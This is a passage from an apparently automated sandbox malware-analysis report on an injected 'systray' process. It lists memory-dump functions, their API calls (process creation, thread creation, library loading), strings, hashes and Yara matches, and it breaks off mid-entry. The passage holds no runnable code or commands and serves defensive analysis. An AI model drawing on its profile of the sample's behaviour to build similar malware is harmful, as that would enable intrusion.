                                                                  • Opcode Fuzzy Hash: 490da627e748a9750414c6b90dd52b2af185088a062f9d8a536850bfdecb2728
                                                                  • Instruction Fuzzy Hash: 9790022224546112F150715C45056164005EBE1205F55C261A0855595D8955D9566221
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 0-1269752229
                                                                  • Opcode ID: f5ccac13697174ec231668e25c50ef8a029c1f2222106b193210969eab252171
                                                                  • Instruction ID: 1fc22a16f91bd7c8a7a9dcb4d12e132cb7752e6b6f477c03f923f67a768bfc61
                                                                  • Opcode Fuzzy Hash: f5ccac13697174ec231668e25c50ef8a029c1f2222106b193210969eab252171
                                                                  • Instruction Fuzzy Hash: EB81A872605781AFCB11DF24C886BEAFBB8FF45310F14465EE59A9B342D7316A01CB92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: b5f9551d4bf3beb6514102cb83c05c40bdfbce06737bb5c6df2bc5480c0f2abf
                                                                  • Instruction ID: 8b9c730281978b3185555926e19de8593f4c7030e6f78d2aaaf2f6bffb513ba0
                                                                  • Opcode Fuzzy Hash: b5f9551d4bf3beb6514102cb83c05c40bdfbce06737bb5c6df2bc5480c0f2abf
                                                                  • Instruction Fuzzy Hash: 103123B5A00609EFDB00DFD8D880DEEB7B9BF88304B118559E955E7214D775EE05CBA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: 06e59bfc35feeb982c47c7e53796437bb8801e0190597e6a80f2f52de1a1a31c
                                                                  • Instruction ID: 8096078255d0100706e3db3149cba1d069c4a5834ae33b9f8c31ca4fa51afee9
                                                                  • Opcode Fuzzy Hash: 06e59bfc35feeb982c47c7e53796437bb8801e0190597e6a80f2f52de1a1a31c
                                                                  • Instruction Fuzzy Hash: B13130B5A0060AAFDB00DFD8D880DEFB7BABF88304B118559E505EB214D775EE05CBA0
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 00AD3CBB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 6977e1f1069a8bfa9e38ab5dc357e0a120a5636496327200c40b030ff972773d
                                                                  • Instruction ID: ca13b7415c187b2ebea8def3ecda6fafd297d8cbaf041cbc65fb86ac38738687
                                                                  • Opcode Fuzzy Hash: 6977e1f1069a8bfa9e38ab5dc357e0a120a5636496327200c40b030ff972773d
                                                                  • Instruction Fuzzy Hash: CD31DFB1A45305BBCB10DF60C881FEAB7B9FF84304F10452DEA1A6B340D774AA40CBA1
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AC4712
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction ID: 3ca11daae5bfd12e4df511b435d57a43472b923119490a43e7ee3f8dd528aa54
                                                                  • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction Fuzzy Hash: BD0121B6D4020EABDF10EBE4DD42FDEB3B89B54308F004195E91997241F631EB14CB91
                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,00AC845E,00000010,?,?,?,00000044,?,00000010,00AC845E,?,?,?), ref: 00AD9A73
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: cd0296cf9238abdedae7624c92a7e3debef023e4f7cc1ae673f7c9365dc304a1
                                                                  • Instruction ID: 5d6c3d93729394f02b84439b028d15f5719004eabcb52f5260056688890d6df4
                                                                  • Opcode Fuzzy Hash: cd0296cf9238abdedae7624c92a7e3debef023e4f7cc1ae673f7c9365dc304a1
                                                                  • Instruction Fuzzy Hash: 7E01CCB2200148BFCB04DE99DC91EEB77ADEF8C714F508208BA19E3281D630F8518BA4
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AB9F05
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: b12b393f118a8295544c15101f484bb8c07bd4948d29356ae4d4f5285100f024
                                                                  • Instruction ID: ea780a584e85c8c3529f2ca8336f54f0cc647acc51267892036bfc2374607897
                                                                  • Opcode Fuzzy Hash: b12b393f118a8295544c15101f484bb8c07bd4948d29356ae4d4f5285100f024
                                                                  • Instruction Fuzzy Hash: 57F06D7338421436E23066A9AC03FE7B79CDB80B71F140426F70DEB2C1E992B81182E4
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AB9F05
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 7e8308594433b2d1d38497223bffc2dcea9e93ca053d5d3f1fb4653febd412f1
                                                                  • Instruction ID: 9daf64178f88bc7d588402900b041c10934aed4a9473f69c5502ce9e49ed6f1d
                                                                  • Opcode Fuzzy Hash: 7e8308594433b2d1d38497223bffc2dcea9e93ca053d5d3f1fb4653febd412f1
                                                                  • Instruction Fuzzy Hash: 62F0927738420036E23066A89D03FE7779D8F90B60F58041AF709EB2C2D9A6751587A4
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,00AC3F0A,000000F4), ref: 00AD99BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction ID: f247a7ece92fe6a2b84667fd8cacc4d10baa31c430a5058d84682ca664cae7d3
                                                                  • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction Fuzzy Hash: 72E06D712007447FE610EE99DC41EDB33ADEFC5710F404409FD18A7242CA70B9118AB4
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00AC1B79,?,00AD60DF,00AC1B79,00AD57BF,00AD60DF,?,00AC1B79,00AD57BF,00001000,?,?,00000000), ref: 00AD996F
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction ID: 33b854687aa63178719fd3eea2bd06c50e1c33c76baf2137040364c3220371c4
                                                                  • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction Fuzzy Hash: B0E09271600244BFC610EE98DC42FDB73ADEFC8710F404009FD08A7282C670B92187B4
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AC84CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 60edccb0ba47fa3321c4387d612a709d1484dd626286a532c5630f6e5dfc211b
                                                                  • Instruction ID: f212d54681c2a2e2afcbf629bd4117ad293986f2e30937c824b102fbfcfd237f
                                                                  • Opcode Fuzzy Hash: 60edccb0ba47fa3321c4387d612a709d1484dd626286a532c5630f6e5dfc211b
                                                                  • Instruction Fuzzy Hash: 12E0267124020827EB286BA8DD46F73335CAB48724F0906A5B91CCF6C5F93DF8028150
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AC84CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 7b8c93237cec7d8edb5c133dea6e8ac4c563d1ac5f1c8e99e23de68a61dd1299
                                                                  • Instruction ID: ae8117c701b4f44b9f97932ce573abed1ebf8989688bef6307f6a28e207fabbf
                                                                  • Opcode Fuzzy Hash: 7b8c93237cec7d8edb5c133dea6e8ac4c563d1ac5f1c8e99e23de68a61dd1299
                                                                  • Instruction Fuzzy Hash: 81E0267510020827EB386B68CE86F73335C7B48B30F094658B92CDF6C5E97CF9024250
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00AC1E80,00AD80FE,00AD57BF,00AC1E46), ref: 00AC82C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: d2ae084e7750a1bf883497dd8e2d79e356aeae5b5f395dd8145bf6eb53b565e6
                                                                  • Instruction ID: cf46087cbf7304c687ddda7d4e471da72a31fc9332e462ef98785ccae23b576b
                                                                  • Opcode Fuzzy Hash: d2ae084e7750a1bf883497dd8e2d79e356aeae5b5f395dd8145bf6eb53b565e6
                                                                  • Instruction Fuzzy Hash: 3AD05EB12883043BF650A7E5DD07FA6369D6B40764F054468BA48DB2C3FD66F4104165
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 00AC0F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                  • Instruction ID: e44cd6ccd791be5ffce4e23e50b6858cff68a5e9e4e35dc1cba126d6339328b9
                                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                  • Instruction Fuzzy Hash: 05D0227BB4000C7AAA1246C4ACC1DFFB72CEB84BA6F00406BFF08E2040E6218D020BF0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7dbebbadfe8ff99af7f74fa904d9e54418a9c7800e5163fa84ac5eca3703dac7
                                                                  • Instruction ID: a90834cd68c799221f9cd92992c2bb6efaf5254894cfdc6b684fd5dd39cd6fd1
                                                                  • Opcode Fuzzy Hash: 7dbebbadfe8ff99af7f74fa904d9e54418a9c7800e5163fa84ac5eca3703dac7
                                                                  • Instruction Fuzzy Hash: CCB09B729015D5D6FB15F76047097177900EBD1705F55C1E1D3071643E4738D1D1E175
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4781931793.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_48e0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                  • API String ID: 0-3558027158
                                                                  • Opcode ID: 8ca718d367b934c1f3181d35a11771b5b6ef61d0648c5f42973332d07e380016
                                                                  • Instruction ID: 9cee3e2d07af816b537d31b343a4b4403f4974eefb29f26ae264a61a1bfb6f43
                                                                  • Opcode Fuzzy Hash: 8ca718d367b934c1f3181d35a11771b5b6ef61d0648c5f42973332d07e380016
                                                                  • Instruction Fuzzy Hash: AF9151F04082948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 179ef4c5ef9e3728f162a3b1d0d8530b93af0e0a0c5bda59978cf65680e705c5
                                                                  • Instruction ID: 9d0c108bcfec23835dfa8ab6e452d743a652b96637148b190141f3b6ac537361
                                                                  • Opcode Fuzzy Hash: 179ef4c5ef9e3728f162a3b1d0d8530b93af0e0a0c5bda59978cf65680e705c5
                                                                  • Instruction Fuzzy Hash: 8951D7B5A00116BFDB14DFAC899097EFBB8FF4824475081E9E469E7641E334FE509BA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 47e56a2180bbc59e4a73bc883587097e85e5d623d6d14527ee7d02de11815fd1
                                                                  • Instruction ID: 81513a8d32cc25d206dfbd4422396846f1a4c35418747fd429c5e358061d174b
                                                                  • Opcode Fuzzy Hash: 47e56a2180bbc59e4a73bc883587097e85e5d623d6d14527ee7d02de11815fd1
                                                                  • Instruction Fuzzy Hash: 2D5103B5A40645AFDF28EE9CC9908BFB7F8EF44204B4484DDE996D7641E674FA00CB60
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04B44787
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04B44742
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04B44655
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04B446FC
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04B44725
                                                                  • ExecuteOptions, xrefs: 04B446A0
                                                                  • Execute=1, xrefs: 04B44713
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 99ee504f004e3e4c7bc82acf3ac2d479d4d075792c3ef4b114a1e8da979a4972
                                                                  • Instruction ID: a240c8be4ce41eb2a13c7cb0173d6f1fa80aafa63e450628f9ebba82937280b4
                                                                  • Opcode Fuzzy Hash: 99ee504f004e3e4c7bc82acf3ac2d479d4d075792c3ef4b114a1e8da979a4972
                                                                  • Instruction Fuzzy Hash: E15127716002097AEF11ABA4DC99FBABBA8EF48345F0440D9E506A71D1EF71BE41CF90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: 82b5832cc96a0a5c58984aaf93264fb89a9bdb64c60723476035c10040659939
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: E181A170E092499EEF248F68C8917FEBBB1EF55710F984599E861A72B0D734B940CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4781931793.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_48e0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EYPb$F\Z[$PW~\$[QGZ$fTST$w@\Y$xZO\
                                                                  • API String ID: 0-1522131713
                                                                  • Opcode ID: 812d392b6bd7c5ec01e296ea9a61cc5e77fb92519fbc9d1b5007f91b56649fb0
                                                                  • Instruction ID: 4d2187c69c496a9633636bca22bbd094f328c9a66c84a929d3560da4c9507237
                                                                  • Opcode Fuzzy Hash: 812d392b6bd7c5ec01e296ea9a61cc5e77fb92519fbc9d1b5007f91b56649fb0
                                                                  • Instruction Fuzzy Hash: 1F3136B080474CDBDB08DF81E554ADEBBB1FF00759F814019E82A7F204D7718669CB89
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B402E7
                                                                  • RTL: Re-Waiting, xrefs: 04B4031E
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B402BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: 40f3eb3d33a4605c02281a1f7dce44c30e216b8e9ec2e29c4c9d9dd6a3f16d1d
                                                                  • Instruction ID: fe71f748b4f911fb4fade739b77afbfeaa89a41c8e057c87e366a90f138fff35
                                                                  • Opcode Fuzzy Hash: 40f3eb3d33a4605c02281a1f7dce44c30e216b8e9ec2e29c4c9d9dd6a3f16d1d
                                                                  • Instruction Fuzzy Hash: 2EE1BE706047419FDB24DF68C884B2AB7E0FB88714F140A9EF6A58B2E0E774F845DB42
                                                                  Strings
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04B47B7F
                                                                  • RTL: Re-Waiting, xrefs: 04B47BAC
                                                                  • RTL: Resource at %p, xrefs: 04B47B8E
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: 0ea673ac91f854a6d661bf05e4b10bd6ad81ffd354c53cbf73b3d84f9303f1b7
                                                                  • Instruction ID: 297280fefaab1785f0855d69b0f9f11ea0147d56a2b905d8a85588f5f14bd1a9
                                                                  • Opcode Fuzzy Hash: 0ea673ac91f854a6d661bf05e4b10bd6ad81ffd354c53cbf73b3d84f9303f1b7
                                                                  • Instruction Fuzzy Hash: A54102313047029FDB20DE29D850B6ABBE5EF88711F004A9DF99ADB290DB31F805CB91
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B4728C
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 04B472C1
                                                                  • RTL: Resource at %p, xrefs: 04B472A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04B47294
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: 2eeb560cf419234c2907352f8432c6f5684b480a887dcd732406d66c27053f69
                                                                  • Instruction ID: 3ac4cc94217b24116cb6a09607d0b2ffcf44c90c100589def89616d445b62913
                                                                  • Opcode Fuzzy Hash: 2eeb560cf419234c2907352f8432c6f5684b480a887dcd732406d66c27053f69
                                                                  • Instruction Fuzzy Hash: E7413031704202AFEB20DE68CC41F6ABBA4FB85714F104699F965EB680DB21F842DBD1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004BCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_4aa0000_systray.jbxd
                                                                  Similarity
